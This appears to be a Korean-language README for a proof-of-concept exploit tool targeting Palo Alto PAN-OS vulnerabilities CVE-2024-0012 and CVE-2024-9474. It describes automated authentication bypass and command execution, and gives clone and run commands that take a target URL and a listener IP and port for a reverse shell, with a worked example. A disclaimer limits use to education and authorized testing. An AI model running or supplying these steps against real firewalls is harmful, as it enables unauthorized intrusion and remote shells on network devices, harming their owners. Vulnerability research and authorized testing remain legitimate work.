
이 PoC는 Palo Alto PAN-OS의 취약점, 특히 CVE-2024-0012 및 CVE-2024-9474를 대상으로 합니다. 이 스크립트는 페이로드 생성, 청크 전송 및 원활한 명령 실행을 포함한 익스플로잇 과정을 자동화합니다.
이 PoC(Proof-of-Concept) 스크립트는 Palo Alto PAN-OS의 취약점, 특히 CVE-2024-0012 및 CVE-2024-9474를 대상으로 하며, 인증 우회, 페이로드 생성, 청크 전송, 원활한 명령 실행 등 익스플로잇 과정을 자동화합니다.
⚠️ 이 스크립트는 교육 및 공인된 침투 테스트 목적으로만 사용됩니다. 무단 사용은 불법입니다.
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: 대상 URL (http 또는 https 포함)<LISTENER_IP>: 리버스 셸 리스너용 IP 주소<LISTENER_PORT>: 리버스 셸 리스너용 포트python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5
이 PoC에 대한 전체 분석 및 기술적 통찰력은 이 Medium 글에서 확인하세요!
이 PoC는 교육 목적 및 공인된 보안 테스트만을 위한 것입니다. 이 도구의 무단 사용은 엄격히 금지됩니다. 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.